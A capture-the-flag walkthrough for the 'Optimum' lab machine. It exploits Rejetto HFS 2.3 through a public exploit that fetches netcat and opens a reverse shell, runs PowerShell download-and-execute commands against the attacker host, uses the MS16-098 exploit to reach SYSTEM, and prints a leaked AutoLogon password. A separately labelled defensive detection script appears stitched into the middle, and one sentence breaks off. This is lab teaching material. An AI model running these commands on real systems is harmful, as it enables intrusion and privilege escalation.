Optimum

Reconnaissance:

WAPP http://10.10.10.8/

  • Security: Basic

  • CDN: Google Hosted Libraries

  • JavaScript libraries: jQuery 1.4.4

Retire.js

  • jquery 1.4.4

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.8  

80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.8 

All 1000 scanned ports on 10.10.10.8 are in ignored states.

Our initial recon shows that our only point of entry is through exploiting the HTTP File Server.

Enumeration:

Browse to the HTTP File server. It seems to be a server that allows you to remotely access your files over the network. There’s a login page that might be using default credentials. This could potentially allow us to gain an initial foothold. Let’s google the server name and version to learn more about it.

The first two google entries are publicly disclosed exploits that would give us remote code execution on the box! Click on the first entry and view the compile instructions.

#Usage : python Exploit.py <Target IP address> <Target Port Number>

#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).  
#          You may need to run it multiple times for success!

To prepare and run the exploit, we need to perform a few tasks:

  1. Host a web server on our attack machine (kali) on port 80 in a directory that has the netcat executable file.

  2. Start a netcat listener on the attack machine.

  3. Download the exploit and change the ip_addr & local_port variables in the script to match the IP address of the attack machine and the port that netcat is listening on.

  4. Run the script using python as stated in the Usage comment.

Before we do that, let’s try and understand what the script is doing.

Everything in yellow (in double quotes) is URL encoded. Let’s decode it using an

Three functions are being called:

  • script_create(): creates a script (script.vbs) that when run downloads the nc.exe from our attack machine and saves it to the C:\Users\Public\ location on the target machine.

  • execute_script(): uses cscript.exe (the command-line version of the Windows Script Host, which provides command-line options for setting script properties) to run script.vbs.

  • nc_run(): runs the netcat executable and sends a reverse shell back to our attack machine.

Now that we understand what the script is doing, what remains to be answered is why remote code execution is possible at all. Further googling tells us:

The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aka HFS or HttpFileServer) 2.3x before 2.3c allows remote attackers to execute arbitrary programs via a %00 sequence in a search action. This matches what we saw in the exploit: every request that runs arbitrary code is a search containing the %00 sequence.
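A defender-side check for the two facts above, as an added example that is not part of the writeup or of the HFS project: it flags an HFS Server banner in the affected range (2.3x before 2.3c, so the "HFS 2.3" banner from the nmap scan counts) and flags search requests whose decoded search parameter carries a %00 null byte. The log lines and their layout are constructed for the example.

```python
"""Added defender-side check for the HFS issue discussed above; this is not
code from the writeup or from the HFS project. Two things are flagged:
an HFS Server banner in the affected 2.3x-before-2.3c range, and search
requests whose decoded 'search' parameter carries a %00 null byte."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines in a common-log-like layout (not captured
# from the target); only the last one carries a null byte in the search query.
SAMPLE_LOG = """\
10.10.14.10 - - [01/Jan/2024:10:00:00 +0000] "GET / HTTP/1.1" 200 1024
10.10.14.10 - - [01/Jan/2024:10:00:05 +0000] "GET /?search=report HTTP/1.1" 200 512
10.10.14.10 - - [01/Jan/2024:10:00:09 +0000] "GET /?search=%00foo HTTP/1.1" 200 0
"""

BANNER_RE = re.compile(r"^HFS\s+(\d+)\.(\d+)([a-z]?)$")
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def hfs_banner_affected(server_header: str) -> bool:
    """True for 'HFS 2.3', 'HFS 2.3a' and 'HFS 2.3b' (2.3x before 2.3c).

    Banners that do not parse as HFS are reported as not affected, so a
    hidden or rewritten banner still needs a manual version check."""
    m = BANNER_RE.match(server_header.strip())
    if not m:
        return False
    major, minor, suffix = int(m.group(1)), int(m.group(2)), m.group(3)
    # Suffix letters sort lexically: '' < 'a' < 'b' < 'c'.
    return (major, minor) == (2, 3) and suffix < "c"


def null_byte_search_requests(log_text: str) -> list:
    """Return the request targets whose 'search' parameter decodes to a
    value containing a null byte (parse_qs does the percent-decoding)."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = m.group(1)
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if any("\x00" in v for v in params.get("search", [])):
            hits.append(target)
    return hits


if __name__ == "__main__":
    print("banner from the nmap scan affected:", hfs_banner_affected("HFS 2.3"))
    for target in null_byte_search_requests(SAMPLE_LOG):
        print("null byte in search request:", target)
```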

Foothold:

Now that we understand the exploit, let’s run it. In the instructions, the first step is to host a web server on our attack machine (kali) on port 80 in a directory that has the netcat executable file. Locate the Windows netcat executable file in the Kali VM and copy it to the directory we will serve.

cp nc.exe ~/Desktop/

Start the HTTP server.

┌──(kali㉿kali)-[~/Desktop]
└─$ python -m SimpleHTTPServer 80 

The second step is to start a netcat listener on the attack machine.

┌──(kali㉿kali)-[~]
└─$ nc -nlvp 2560

The third step is to download the exploit and change the ip_addr & local_port variables in the script to match the IP address of the attack machine and the port that netcat is listening on.

┌──(kali㉿kali)-[~]
└─$ searchsploit 39161

┌──(kali㉿kali)-[~]
└─$ searchsploit -m 39161

┌──(kali㉿kali)-[~]
└─$ mv 39161.py Desktop  

The fourth step is to run the exploit.

┌──(kali㉿kali)-[~/Desktop]
└─$ python 39161.py 10.10.10.8 80

We get a non-privileged shell back!

C:\Users\kostas\Desktop>whoami
optimum\kostas

Grab the user flag.

C:\Users\kostas\Desktop>dir
C:\Users\kostas\Desktop>type user.txt

We don’t have system privileges, so we’ll need to find a way to escalate privileges.

Privilege Escalation:

WinPEAS:

I started with WinPEAS to look for escalation paths. I cloned a copy of the repo to my host, started an SMB server in the path with the Windows exe with sudo smbserver.py share . -smb2support, and copied it to Optimum:

copy \\10.10.14.10\share\winPEAS.exe . 

Now I’ll run it with .\winPEAS.exe. Scanning through the output, there were a few interesting things. The box is Windows Server 2012 R2, and 64-bit.

There were creds for kostas:
  [+] Looking for AutoLogon credentials
    Some AutoLogon credentials were found!!
    DefaultUserName               :  kostas
    DefaultPassword               :  kdeEjDowkS*   

A bunch of services were called out as potentially interesting, but nothing in there really panned out.

Watson/Sherlock:

One thing I noticed was missing from the winPEAS output was Watson results. Watson is a quick checker for CVEs this Windows host might be vulnerable to, and in the original HTB days, that was a common escalation technique (in fact, it is the intended path on this host). My best guess as to why it didn’t run is that the .NET version required by Watson in winPEAS is 4.5, and this host only has up to 4.0.

If I want to run Watson, I think I could get it to work by downloading it and compiling it to match one of the .NET versions on the box, but I wasn’t able to get it working quickly. Instead, because this box is so old, I went to Watson’s predecessor, Sherlock.

Sherlock is a PowerShell script. I’ll download a copy, and see that it defines a bunch of functions, but doesn’t call any. I’ll add a line at the end to call Find-AllVulns. Then I’ll use a Python HTTP server to host a copy, and execute it the same way I got a shell:

PS C:\> IEX(New-Object Net.WebClient).downloadstring('http://10.10.14.10/Sherlock.ps1')

There are three that show “Appears Vulnerable”: MS16-032, MS16-034, and MS16-135.

MS16-098:

Let’s see the system information by running:

systeminfo

Now we know the OS and the version. Using this information and a deep Google search, I found an exploit called MS16-098. All we need to do is download the exe file and upload it to the target machine. First, download the exe file.

Put it on your desktop; we already have a Python server running there on port 80. All we need now is to upload bfill.exe to the target machine (adjust the IP address and port in the URL below to match your own HTTP server), and make sure you use the Downloads directory:

C:\Users\Public\Downloads> powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.8:9005/bfill.exe', 'c:\Users\Public\Downloads\bfill.exe')"

Now let’s navigate to the Downloads directory:

cd C:\Users\Public\Downloads

We will find our bfill.exe file there; all we need to do is execute it:

C:\Users\Public\Downloads>bfill.exe
bfill.exe
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

That's it, we are SYSTEM! Grab the root flag here:

C:\Users\Administrator\Desktop>type root.txt
